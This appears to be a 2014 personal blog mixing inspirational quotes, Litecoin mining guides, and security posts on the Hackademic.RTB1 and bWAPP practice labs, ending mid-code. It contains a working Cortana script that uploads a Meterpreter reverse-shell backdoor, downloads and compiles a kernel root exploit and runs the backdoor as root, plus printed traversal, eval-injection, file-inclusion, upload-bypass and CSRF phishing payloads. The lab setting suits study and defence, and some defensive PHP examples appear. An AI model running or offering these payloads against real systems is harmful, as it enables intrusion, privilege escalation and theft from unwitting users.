Friday, March 7, 2014

My Quotes

Posted by at Friday, March 07, 2014

Always listen to your heart, as it is the messenger of the soul.

For every dark night, there’s a brighter day.

Life’s a wheel of fortune and it’s my chance to spin it.

During your life, never stop dreaming. No one can take away your dreams

We can make the world secure and a safe place to live beside each other, with love.
I would like to get a good job to have a good life.

For the past 20 years, I have looked in the mirror every morning and asked myself: 'If today were the last day of my life, would I want to do what I am about to do today?' And whenever the answer has been 'No' for too many days in a row, I know I need to change something.

Knowledge and perception are the two main doors of the mind.

My mama always used to tell me: If you can’t find somethin’ to live for, you best find somethin’ to die for.

I am trying to find myself. Sometimes that's not easy.

Tuesday, February 4, 2014

Litecoin Mining OS The "SMOS LTCRabbit Edition" USB stick mining Operating System

Posted by at Tuesday, February 04, 2014

A friend asked me if I could help him with a guide to mining Litecoins. I had never mined before, puhhh, but I learn fast.

Now I have found a better way if you want to build an LTC mining rig.

 

 

Short Intro about LiteCoins

Litecoin is a peer-to-peer Internet currency that enables instant payments to anyone in the world. It is based on the Bitcoin protocol but differs from Bitcoin in that it can be efficiently mined with consumer-grade hardware. Litecoin provides faster transaction confirmations (2.5 minutes on average) and uses a memory-hard, scrypt-based mining proof-of-work algorithm to target the regular computers with GPUs most people already have. The Litecoin network is scheduled to produce 84 million currency units.

One of the aims of Litecoin was to provide a mining algorithm that could run at the same time, on the same hardware used to mine Bitcoins. With the rise of specialized ASICs for Bitcoin, Litecoin continues to satisfy these goals. It is unlikely for ASIC mining to be developed for Litecoin until the currency becomes more widely used.

For more information, visit the Litecoin page.

 

What we need to mine Litecoins:

• An ATI/Nvidia GPU card or a CPU, with a running OS
• Mining software (GuiMiner) or a standalone OS
• Litecoin wallet
• Litecoin pool

 

Nr.1

Get the downloads here:

Download the Litecoin client for your wallet from https://litecoin.org/

Install Litecoin for your OS, start it and wait for it to update; your wallet is now ready.

Nr.2

Join a pool; my choice is ltcrabbit.com.

Join the LtcRabbit pool here: https://www.ltcrabbit.com/

Make a new account; it's very simple.

Add a new worker: “My Account” > My Workers > Add a New Worker

The pool is ready to mine some LTC coins. Well done.

The worker is ready; now we need to follow these steps.

 

  1. Why should I use the "SMOS-LTCRabbit-Edition" USB stick mining operating system?

    LTC mining requires perfect configuration of your graphic card driver, operating system and the miner software cgminer. It is very hard to configure all this and get the maximum hashrate from your graphic cards.
    Therefore, SMOS-Linux.org developed, in cooperation with LTCRabbit, a mining operating system which is easy to use and requires only a minimum of configuration. Just download the operating system, write it to a USB stick, boot your PC from the USB stick, enter your worker username and password (cgminer.conf) and start mining LTC.

 

      1. Which hardware is supported
        • Best choice: buy the new AMD R9 280x or older Radeon HD 7950 or HD 7970 (our mining operating system will work out of the box with these cards)
        • Now supported with SMOS LTCRabbit V2: AMD Radeon HD 7990, R9 270X, R9 290X
        • AMD Radeon HD Series 7800, 7700, 7300, 6900, 6800, 6700, 6600, 6550D, 6530D, 6500, 6410D, 6370D, 6310D, 6300, 6200, 5900, 5800, 5700, 5600, 5500, 5400 (find optimal settings for these cards here.)
        • OS supports up to 6 GPUs
        • OS does not support WLAN sticks only ethernet cable
      2. Create account.
        • Register here, or skip this step if you already have the ltcrabbit account
        • Create a worker that will be used by the miner, or skip this if already done.
      3. Download our LTC mining operating system "SMOS-LTCRabbit-Edition"
      1. SMOS-LTCRabbit-Edition-V2 (1 GB)

        • Extract the ZIP file. You'll find the file SMOS-LTCRabbit-Edition-V1.img inside
        • username: root / password: rabbit
        • SMOS-LTCRabbit-Edition is of course free of donation mining!
        • Release notes (30.12.2013)
      2. Write the image file to your USB stick (Windows)
        • Download Win32 Disk Imager and extract it
        • Insert your USB stick (minimum size: 2GB, all data will be erased, USB 2.0 or better 3.0)
        • Start Win32 Disk Imager
        • Select "SMOS-LTCRabbit-Edition-V1.img" from your disk as "image file" and select the drive letter of your USB stick as "drive". Click "write" to write the image to your USB stick.
          Note: if your USB drive letter does not show up in Win32 Disk Imager, you have to format your USB stick so that Windows shows it. Press Start - Run - "diskmgmt.msc" to open the Windows Disk Management utility. Delete all old partitions on your USB stick and format it with NTFS or FAT32. Then your USB stick will show up in Win32 Disk Imager.
      3. Boot from your USB stick
        • Insert your USB stick containing SMOS-LTCRabbit-Edition
        • Make sure your monitor is connected to your separate AMD Radeon HD graphic card and NOT to your onboard HDMI connector / or onboard graphic card
        • Boot your PC from the USB stick
        • If it does not boot from the USB stick, check the boot order in your BIOS
      4. Configure SMOS-LTCRabbit-Edition
        • You should see the desktop now
        • 20 seconds after boot, mining automatically starts. Double click on stop_mining on the desktop after mining has started. The stop_mining script gives no feedback, but it does its job.
        • Double click on cgminer.conf to open the mining configuration file (see screenshot below)

        • Replace "yourusername.workername" and "password" with your worker credentials. You find the credentials in your LTCRabbit memberarea, menu "Account" -> "Worker"
        • If you run a Radeon HD 7950, HD 7970 or R9 280x you are done. Everything is configured already. Click on start_mining on the desktop (again, this script does not give any feedback, but it starts mining).
        • If you run another graphic card, please find the correct settings for your specific card here. You definitely have to find the correct values for:
          intensity (-I) Please lower intensity if you experience problems.
          thread-concurrency
          gpu-thread (-g)
          worksize (-w)
        • If you experience problems, first thing is to disable GPU overclocking by deleting following lines in cgminer.conf:
          "gpu-engine" : "1000",
          "gpu-powertune" : "20",
          "gpu-memclock" : "1250"
      5. Watch your mining rig status remotely
        • You can watch your rig's mining status from another PC located in your local network. Open the following URL in your browser:
          http://YourRigIP:8080
          Please replace YourRigIP with the IP address of your mining rig. You can find it in the upper left corner of the desktop (see screenshot above)
        • You can connect to your rig by SSH (Port 222, Username root, Password rabbit):
          Linux: open terminal and enter "ssh root@YourRigIP -p 222"
          Windows: use the SSH client Putty to connect to the rig.
      6. Technical details
      7. Release notes
        • SMOS LTCRabbit Edition V1 (22.11.2013): initial release
        • SMOS LTCRabbit Edition V2 (30.12.2013): Catalyst drivers upgraded to 13.11b, ADL upgraded to 6.0, CGMiner upgraded to 3.7.2, improved webinterface. Full R9 and 7990 GPU support. Automatic reconnect of CGMiner is now working correctly.
    • Credits: SMOS-LTCRabbit-Edition is based on BAMT, which was further enhanced by SMOS-Linux.org to SMOS, which was adapted to the needs of LTCRabbit by SMOS-Linux.org

Nr.8

Add your payout wallet address from your wallet to ltcrabbit.

Now you only need to wait and get $$$ from your VGA cards. Cool.

 

    ---------------------------------------------------------------

    Nr.9

    Info coming soon; first I need some coins to cash out.

    Get some LTC coins and cash out to real $$$.

    ---------------------------------------------------------------

     

    Nr.10

    Donate Some Litecoins for the great tut ;)

    Donate Send to : LPEVLuHAwSc53otzLLmVnjde2r7wUVTMsZ

     

    Have pfun

    Income estimation for 2 x AMD ATI XFC HD 5830 1gb DDR5 running 24/7 :
    LTC in 24h: 0.32552875
    LTC in 7 days: 1.67870124
    LTC in 1 month: 6.76586245

    LTC > USD: 1 LTC ≈ 21 $

     

     

     

    Sunday, January 26, 2014

    Easy Beginner Guide : How to mine LiteCoins @ LtcRabbit

    Posted by at Sunday, January 26, 2014

    A friend asked me if I could help him with a guide to mining Litecoins. I had never mined before, puhhh, but I learn fast.

    Short Intro about LiteCoins

    Litecoin is a peer-to-peer Internet currency that enables instant payments to anyone in the world. It is based on the Bitcoin protocol but differs from Bitcoin in that it can be efficiently mined with consumer-grade hardware. Litecoin provides faster transaction confirmations (2.5 minutes on average) and uses a memory-hard, scrypt-based mining proof-of-work algorithm to target the regular computers with GPUs most people already have. The Litecoin network is scheduled to produce 84 million currency units.

    One of the aims of Litecoin was to provide a mining algorithm that could run at the same time, on the same hardware used to mine Bitcoins. With the rise of specialized ASICs for Bitcoin, Litecoin continues to satisfy these goals. It is unlikely for ASIC mining to be developed for Litecoin until the currency becomes more widely used.

    For more information, visit the Litecoin page.

     

    What we need to mine Litecoins:

    • An ATI/Nvidia GPU card or a CPU, with a running OS
    • Mining software (GuiMiner) or a standalone OS
    • Litecoin wallet
    • Litecoin pool

     

    Nr.1

    Get the downloads here:

    Download the Litecoin client for your wallet from https://litecoin.org/

    Install Litecoin for your OS, start it and wait for it to update; your wallet is now ready.

    Nr.2

    VERY IMPORTANT, ONLY FOR ATI USERS !!!

    Many people skip this 2nd step, and they end up having extremely bad results... So, here we go, with bold letters.
    Please ensure you have the following dependencies installed
    • AMD APP SDK: http://developer.amd.com/tools/hc/AMDAPPSDK/downloads/Pages/default.aspx
    • Latest AMD drivers: http://support.amd.com/us/gpudownload/Pages/index.aspx

    or

    Known working for all cards AMD driver (12.8):
    12.8 32-bit
    12.8 64-bit
    AVOID 12.10 DRIVERS, THEY SEEM TO BREAK LITECOIN PERFORMANCE. 13.X SEEM TO BE OKAY.

    Update your drivers, install the AMD APP SDK, then do one simple reboot.

     

    Nr.3

    Join a pool; my choice is ltcrabbit.com.

    Join the LtcRabbit pool here: https://www.ltcrabbit.com/

    Make a new account; it's very simple.

    Add a new worker: “My Account” > My Workers > Add a New Worker

    The pool is ready to mine some LTC coins. Well done.

     

    Nr.4

    On A running Windows System we can use CGMiner LTCRabbit V1.

    Download CGMiner LTCRabbit V1 fork for mining Litecoins :  Download

    Download, unpack and run the test batch: start_mining_ltcrabbit_slot_1.bat

    After a short test (give it 10 mins) you can edit batch files 1-4 with your worker + pass.

    Or write a multi-mining batch with a conf; maybe later.

    "Accepted" means it works ;) and you can change the worker to your own worker.

    If you have multi gpus you can test slot_2-4 too.

    start_mining_ltcrabbit_slot_1.bat >> use gpu 0

    start_mining_ltcrabbit_slot_2.bat >> use gpu 1

    start_mining_ltcrabbit_slot_3.bat >> use gpu 2

    start_mining_ltcrabbit_slot_4.bat >> use gpu 3

     

    And Yes you can run all cards at the same time but only if you got 4 x vga cards or more.

    Change the worker name + pass in the batch files to your own.

    .\cgminer-3.7.2-windows\cgminer.exe --scrypt -u yourworkeruser.namehere -p yourpasswordhere -o stratum+tcp://eu.ltcrabbit.com:3333 --gpu-platform 0 -d 0 -w 256 -v 1 -I 18 -g 1 -l 1 -T  --thread-concurrency 6144

     

  • If you run another graphic card, please find the correct settings for your specific card here. You definitely have to find the correct values for:
    intensity (-I) Please lower intensity if you experience problems.
    thread-concurrency
    gpu-thread (-g)
    worksize (-w)
  • Save it now, close all other miners and run the batch file again.

    Be happy with some Litecoins.

     

    Nr.5

    Add your payout wallet address from your wallet to ltcrabbit.

    Now you only need to wait and get $$$ from your VGA cards. Cool.

     

    ---------------------------------------------------------------

    Nr.6

    Info coming soon; first I need some coins to cash out.

    Get some LTC coins and cash out to real $$$.

    ---------------------------------------------------------------

     

    Nr.7

    Donate Some Litecoins for the great tut ;)

    Donate Send to : LPEVLuHAwSc53otzLLmVnjde2r7wUVTMsZ

     

    Have pfun

    Income estimation for 2 x AMD ATI XFC HD 5830 1gb DDR5 running 24/7 :
    LTC in 24h: 0.32552875
    LTC in 7 days: 1.67870124
    LTC in 1 month: 6.76586245

    LTC > USD: 1 LTC ≈ 21 $

    Wednesday, January 22, 2014

    Auto Rooting Kernel < 2.6.36 Menu for Cortana Cobalt Engine v0.1

    Posted by at Wednesday, January 22, 2014

    Here I wrote a very simple Cortana auto-rooting script for kernels < 2.6.36.

    Tested on Hackademic.RTB1 : Demo

     

    # Auto Rooting < 2.6.36 Menu for Cobalt Engine v0.1
    # Contana Script Engine r0ckz.
    # by cr4shyyy
    # from http://security-is-just-an-illusion.blogspot.de
    #debug(7);

    popup shell {
    if (host_os(session_host($1)) eq "Linux") {
    menu "Auto Rooting" {
    item "Auto Rooting < 2.6.36" {
    println("Auto Rooting");

    # Generate Payload
    $r_lport = random_port();
    $backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
    $handle2 = openf(">/tmp/linux_backdoor_$r_lport");
    writeb($handle2, $backdoor);
    closef($handle2);

    shell_upload($1, "/tmp/linux_backdoor_$r_lport", "/tmp/linux_backdoor_$r_lport");

    # Launch our aux shells
    handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(LHOST => lhost()));

    # Rooting
    s_cmd($1, "wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c");
    s_cmd($1, "gcc 44219.c -o rootme_1");
    s_cmd($1, "chmod +x rootme_1");
    s_cmd($1, "chmod 0777 rootme_1");
    s_cmd($1, "./rootme_1");
    sleep(10 * 1000);
    s_cmd($1, "chmod +x /tmp/linux_backdoor_$r_lport");
    s_cmd($1, "chmod 0777 /tmp/linux_backdoor_$r_lport");
    s_cmd($1, "chown root:root /tmp/linux_backdoor_$r_lport");
    s_cmd($1, "/tmp/linux_backdoor_$r_lport");
    s_cmd($1, "exit");

    db_sync();

    #s_cmd($1, "nc -lvp 31337");
    #cmd($console, "use exploit/multi/handler");
    #cmd($console, "set LPORT 31337");
    #$host = session_host($1);
    #cmd($console, "set RHOST $host");
    #cmd($console, "set PAYLOAD cmd/unix/bind_netcat");
    #cmd($console, "set ExitOnSession false");
    #cmd($console, "exploit -j");

    }
    }
    }
    }

     


    Have pfun

    Four Days with Cortana Script Engine - Cobalt Strike/Armitage

    Posted by at Wednesday, January 22, 2014
    I wrote a new simple Cortana script with a menu item “Web ToolKit - Others”:

    • Brute Http Dirs (dirb)
    • Searchsploit (searchsploit)
    • Get Exploit (cat exploit)
    • Netdiscover (netdiscover)

     

    # Others for Cobalt Engine v0.1
    # Contana Script Engine r0ckz.
    # by cr4shyyy
    # from http://security-is-just-an-illusion.blogspot.de

    println("\n----------------------------------------\n\c4[*] Others for Cobalt Engine v0.1 Loaded [*] \n----------------------------------------");

    menubar("Web ToolKit", "webstuff",2);

    popup webstuff {
    menu "Others" {
    item "Brute Http Dirs" {

    $ip = prompt_text("Enter Http Server IP");
    if
    ($ip !is $null) {
    show_message("Lets Pwn The Box!");

    println("\n----------------------------------------\n\c4[*] Start Bruteforce Http-Server $ip \n----------------------------------------");
    $console = console();
    cmd($console, "xterm -geometry 150x24+0+100 -hold -e dirb $ip &");
    sleep(2 * 1000);
    }
    }
    item "Searchsploit" {

    $ip = prompt_text("Enter Search Query");
    if
    ($ip !is $null) {

    println("\n----------------------------------------\n\c4[*] Search for exsploit : $ip\n----------------------------------------");
    $console = console();
    cmd($console, "xterm -geometry 150x24+0+100 -hold -e searchsploit $ip &");
    sleep(2 * 1000);
    }
    }
    item "Get Exploit" {

    $ip = prompt_text("Enter Exploit Path /php/webapps/29894.txt");
    if
    ($ip !is $null) {

    println("\n----------------------------------------\n\c4[*] Get Exsploit : $ip\n----------------------------------------");
    $console = console();
    cmd($console, "gnome-terminal -x cat /usr/share/exploitdb/platforms$ip &");
    sleep(2 * 1000);
    }
    }
    item "Netdiscover" {

    $ip = prompt_text("Enter Ip or Range -r");
    if
    ($ip !is $null) {

    println("\n----------------------------------------\n\c4[*] Search New Hosts : $ip\n----------------------------------------");
    $console = console();
    cmd($console, "xterm -geometry 150x24+0+100 -hold -e netdiscover $ip &");
    sleep(2 * 1000);
    }
    }
    }
    }

    Have pfun and feel free to share or host my scripts.

    Saturday, January 18, 2014

    Hackademic.RTB1 Short Video Solution

    Posted by at Saturday, January 18, 2014
    Tools used:

    Kali, Sqlmap, Armitage, Dirb, Netdiscover

    Mission accepted

    Not much to say atm, sorry; just watch the video solution.

    And yeah, I built my own autorooting script for Armitage/Cobalt Strike.

    Script Source maybe later >

    Video Solution :

    Have pfun

    Hackademic.RTB1

    Posted by at Saturday, January 18, 2014

     

    Hackademic.RTB

    This is the first realistic hackademic challenge (root this box) by mr.pr0n
    Download the target and get root.
    After all, try to read the contents of the file 'key.txt' in the root directory.
    Enjoy!

    Source: http://ghostinthelab.wordpress.com/2011/09/06/hackademic-rtb1-root-this-box/

     


    Wednesday, January 15, 2014

    Security-Talk.info a Social Network not only for Ethical Hackers

    Posted by at Wednesday, January 15, 2014


    Welcome to Security-Talk a Social Network not only for Ethical Hackers.

     

    Feel free to participate in our New Community!

    Share your knowledge.

    It is a way to achieve immortality !!!

    Feature :
    Facebook Connect Simple Join Us with Facebook Login
    Social Network Utility (Facebook like Community System)
    Own Forum: Pentest, Video TuTs, Security, Exploits, News, Reverse Engineering, much more ++
    Ask & Questions Area
    Chat/Chat Room for your Friends
    Own Blogs for Users (Not the Best But it works)
    Own Events
    Video Share Support
    Picture Upload Support
    Share Links with Users
    Create own Groups
    Crowdfunding your own Projects (Beta Coming Soon)
    and much more ++

    Share your knowledge.

    It is a way to achieve immortality !!!
    Let Us Grow its Free !!!

    - See more at: http://security-talk.info

    - Feel free to add me as a friend @ http://security-talk.info/user/cr4shy

     

     

    bWAPP Others Bugs

    Posted by at Wednesday, January 15, 2014

    bWAPP, or a buggy web application, is a deliberately insecure web application.
    bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

    What makes bWAPP so unique? Well, it has over 60 web bugs!
    bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

    The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

    You can download bWAPP from here. Have fun!
    It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

    bWAPP Other Bugs

    Part 1-10 Low

    Client-Side Validation (Password)

    Directory Traversal - Files

    Directory Traversal - Directories

    HTTP Response Splitting

    Information Disclosure - Headers

    Information Disclosure – PHP Version

    Information Disclosure - Robots

    PHP Eval Function

    Remote & Local File Inclusion

    Unrestricted File Upload

     

    Client-Side Validation (Password)

    Maybe later ;)

     

    Directory Traversal – Files


    Try to climb higher Spidy...

    A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

    The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.

    Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks.

     

    Example

     

    <?php
    $template = 'red.php';
    if (isset($_COOKIE['TEMPLATE']))
    $template = $_COOKIE['TEMPLATE'];
    include ("/home/users/phpguru/templates/" . $template);
    ?>


    An attack against this system could be to send the following HTTP request:


    GET /vulnerable.php HTTP/1.0
    Cookie: TEMPLATE=../../../../../../../../../etc/passwd

     


    Climb higher, Spidy ;)

    Now we can read local files such as configs, PHP files and all the other good files.


     


    Directory Traversal - Directories






    Directory Traversal Attack is an attack that allows an attacker to traverse or move through one or more forbidden directories to gain access to restricted files. The attack is possible due to improper validation/configuration by either the programmer or the server itself.

    In the context of Web Security, Directory Traversal Attack has two flavors: attacks against web server and attacks against application code.

    Web Server Level Directory Traversal Attack


    Directory Traversal Attacks targeted towards web servers are not very common these days because most web server vendors have realized the potentials of these attacks and have provided patches to their servers. But since not everybody has the latest web server software and because some do not apply patches promptly, it is still possible to find web servers on the internet that are still vulnerable to such attacks.

    Hint : Check the Url


    http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=documents

    Change Url to any other folder


    http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/etc/
    http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/tmp/
    http://192.168.178.1/bWAPP/directory_traversal_2.php?directory=/var/www/
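
A defensive counterpart to the two traversal cases above, as an added example that is not bWAPP's own code: resolve the requested name against a fixed base directory and refuse anything that canonicalizes outside it. The helper name `resolve_inside` and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not bWAPP code; resolve_inside() is a hypothetical helper.
 * Returns the canonical path of $userInput below $baseDir, or null when the
 * input is empty, contains a NUL byte, does not exist, or leaves $baseDir.
 */
function resolve_inside(string $baseDir, string $userInput): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $userInput === '' || strpos($userInput, "\0") !== false) {
        return null;
    }
    // Always join onto the base, so an absolute input such as "/etc/" is
    // looked up as "<base>//etc/" instead of the real /etc.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userInput);
    if ($candidate === false) {
        return null; // target does not exist
    }
    // realpath() has already collapsed "../" and followed symlinks; the
    // trailing separator stops "documents_private" matching "documents".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo tree in a temporary directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'traversal_demo_' . bin2hex(random_bytes(4));
mkdir("$root/documents/sub", 0700, true);
mkdir("$root/documents_private", 0700, true);
file_put_contents("$root/documents/report.txt", "public\n");
file_put_contents("$root/documents_private/secret.txt", "private\n");

// Constructed inputs: two legitimate names, then the shapes shown in the post.
$inputs = [
    'report.txt',
    'sub/../report.txt',
    '../documents_private/secret.txt',
    '../../../../../../../../../etc/passwd',
    '/etc/',
    "report.txt\0.php",
];
foreach ($inputs as $input) {
    $resolved = resolve_inside("$root/documents", $input);
    printf("%-40s %s\n", addcslashes($input, "\0"), $resolved === null ? 'rejected' : 'allowed');
}

// Clean up the demo tree.
unlink("$root/documents/report.txt");
unlink("$root/documents_private/secret.txt");
rmdir("$root/documents/sub");
rmdir("$root/documents");
rmdir("$root/documents_private");
rmdir($root);
```

Only the first two inputs are allowed; the caller still decides with `is_file()` or `is_dir()` what to do with the returned path.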

     




    Have pfun ;)


     


    HTTP Response Splitting


    Dont Know ….. Maybe later


     


    Information Disclosure – Headers


    Information disclosure through HTTP headers is the initial step for malicious users to gain insight into the web platform, tools and technologies in use. With this knowledge an attacker may exploit the known vulnerabilities that apply to those tools and technologies.

    Therefore you should always verify the information you are revealing in HTTP headers, and information disclosure should be minimized as much as possible. The following are the key HTTP headers that provide technical details of the web platform in use.

    • Server: discloses the web server in use, e.g. Server: Apache, Server: Microsoft-IIS/7.5
    • X-AspNet-Version: discloses the ASP.NET version number configured for your web site, e.g. X-AspNet-Version: 4.0.30319
    • X-Powered-By: discloses additional information about ASP.NET or other tools in use, e.g. X-Powered-By: W3 Total Cache/0.9.2.4 or X-Powered-By: ASP.NET,ASP.NET

     


    Tools Used : Tamper Firefox addon




    I love Marvel movies too ;)


     


    Information Disclosure – PHP Version




    Nothing to Say most Vuln ever Public phpinfo();


    Well Done ;)


     


    Information Disclosure – Robots


    The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.


     




     


    PHP Eval Function


    eval() is a PHP function that interprets a given string as PHP code. It is often used in web applications, most of the time to execute PHP code that contains a previously defined variable, although what gets interpreted is easily manipulated.
    The problem is that if eval() executes a variable whose content you can modify, the PHP code it contains will be executed as such.
    Reminder: eval() executes a given string as PHP code but does not write its content into this page or others (unless so desired); it just executes it and displays the result.
    We will see two different PHP source codes using eval(), the possibilities of PHP code injection, and how the way eval() is used can change the syntax of the PHP code to execute.


     


    http://192.168.178.1/bWAPP/php_eval.php?eval=system('cat%20/etc/passwd');


    The contents of the passwd file will be displayed in the page render…..

    Currently this same string works on all security levels.

     


    Remote & Local File Inclusion




    Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:


     




     


    Remote File Inclusion


    Upload php code to pastebin or others and change the url


    http://192.168.178.1/bWAPP/rlfi.php?language=<Bad Url with PHP code >&action=go

    We got it ;) Your PHP code gets executed and loaded.



    Local File Inclusion


    Same as remote, but now you can only read local files.


    http://192.168.178.1/bWAPP/rlfi.php?language=<Load Local File>&action=go
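
From the monitoring side, the eval and file-inclusion requests above leave recognizable query strings in the web server's access log. The following is an added example, not part of bWAPP or the original post, that flags them; the rule set, the function name `suspicious_params`, the `lang_en.php` value and every log line are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

/**
 * Added example: flag requests shaped like the ones in this post in a web
 * server access log. The rule set and the sample log lines are constructed.
 * Returns a list of "parameter: reason" strings for one request target.
 */
function suspicious_params(string $requestTarget): array
{
    $pos = strpos($requestTarget, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($requestTarget, $pos + 1), $params); // URL-decodes once
    $rules = [
        'parent-directory sequence' => '#(?:^|[/\\\\])\.\.(?:[/\\\\]|$)#',
        'absolute system path'      => '#^/(?:etc|proc|tmp|var)(?:/|$)#',
        'URL or stream wrapper'     => '#^(?:[a-z][a-z0-9+.\-]*://|data:)#i',
        'PHP function call'         => '#\b(?:system|exec|passthru|shell_exec|popen|proc_open|phpinfo)\s*\(#i',
    ];
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // array-style parameters are out of scope here
        }
        $decoded = rawurldecode($value); // second pass catches double encoding
        foreach ($rules as $reason => $pattern) {
            if (preg_match($pattern, $decoded) === 1) {
                $findings[] = "$name: $reason";
            }
        }
    }
    return $findings;
}

// Constructed access-log lines (client address from the documentation range).
$log = <<<'LOG'
192.0.2.10 - - [15/Jan/2014:15:16:00 +0100] "GET /bWAPP/directory_traversal_2.php?directory=documents HTTP/1.1" 200 812
192.0.2.10 - - [15/Jan/2014:15:22:04 +0100] "GET /bWAPP/directory_traversal_2.php?directory=/etc/ HTTP/1.1" 200 4096
192.0.2.10 - - [15/Jan/2014:15:23:10 +0100] "GET /bWAPP/directory_traversal_2.php?directory=..%252f..%252fetc HTTP/1.1" 200 4096
192.0.2.10 - - [15/Jan/2014:16:07:23 +0100] "GET /bWAPP/php_eval.php?eval=system('cat%20/etc/passwd'); HTTP/1.1" 200 1934
192.0.2.10 - - [15/Jan/2014:16:13:51 +0100] "GET /bWAPP/rlfi.php?language=http://files.example.invalid/code.txt&action=go HTTP/1.1" 200 933
192.0.2.10 - - [15/Jan/2014:16:19:38 +0100] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 601
LOG;

foreach (explode("\n", $log) as $line) {
    // Pull the request target out of the quoted request line.
    if (preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"#', $line, $m) !== 1) {
        continue;
    }
    $findings = suspicious_params($m[1]);
    echo ($findings ? 'ALERT ' : 'ok    '), $m[1], "\n";
    foreach ($findings as $finding) {
        echo "        $finding\n";
    }
}
```

The first and last lines pass; the other four raise one alert each, including the double-encoded `..%252f` variant.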

     


    Unrestricted File Upload


    Not much to say: on low security you can upload any file; at higher security you need Tamper or other tools to change the format.

    Or change the name to something like goodboy.jpg.php.


     


     












    90 % of bWAPP Done the rest maybe later ;)

    Tuesday, January 14, 2014

    bWAPP Cross-Site Request Forgery (CSRF)

    Posted by at Tuesday, January 14, 2014

     

     

    bWAPP, or a buggy web application, is a deliberately insecure web application.
    bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

    What makes bWAPP so unique? Well, it has over 60 web bugs!
    bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

    The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

    You can download bWAPP from here. Have fun!
    It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

     

    Cross-Site Request Forgery (CSRF)

    Part 1-3 Low

    CSRF (Password)

    CSRF (Transfer Amount)

    CSRF (Secret)

     

    CSRF (Password)

     

     

    Here we can change your password. Let's give it a try.

     

     

    Here we can see the url

    http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change

    password_new=lol

    password_conf=lol

    action=change

     

    With some social engineering skill you can trick the user into clicking your link, which carries the new user password.
    After the user clicks on the link, the password is changed.

     

    Sample :

    Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

    <a href="http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change">Warning Please Read : Dont change your Password!</a>

    Alice clicks on the link and the password is changed to lol.

     

    CSRF (Transfer Amount)

     

     

    We got some money to play with it

    Amount on your account: 1000 EUR

    Account to transfer: 123-45678-90

    Maybe Vuln ?

    Now we transfer 100 EUR to Alice; it works, 900 EUR left. But I want more money, hmmm.

     

     

    Hmm 900 Eur left suckz ...

    Maybe Math can help us

    http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=0&action=transfer

    account=123-45678-90

    amount=0

    action=transfer

    What happens if I add amount=+1.000.000?

     

     

    Ohhh Nooooo

    Amount on your account: -999000 EUR Now only self kill works

    Now, if a + removes money from the account, a - will add money to the account, I hope.

     

     

     

    Now we can stop working and go live in Freedom and Peace

    Amount on your account: 1001000 EUR

    I dont need more sad

     

    Vuln : 2

    With some social engineering skill you can trick the user into clicking your link, which carries the amount of money to transfer.
    After the user clicks on the link, they can say goodbye to their money.

     

    Sample :

    Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

    <a href="http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=1000000&action=transfer">Warning Please Read : You got Hacked please change your Password fast!</a>

    Alice clicks on the link, and bye-bye to Alice's money.
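
The server-side checks that stop both links above (the password change and the transfer), as an added example rather than bWAPP's own code: state changes are accepted only via POST, a per-session synchronizer token is compared in constant time, and the amount must be a positive whole number no larger than the balance. The function names and the session layout are assumptions; plain arrays stand in for `$_POST` and `$_SESSION` so the block runs on its own.

```php
<?php
declare(strict_types=1);

/** Create (once per session) and return the token to embed in every form. */
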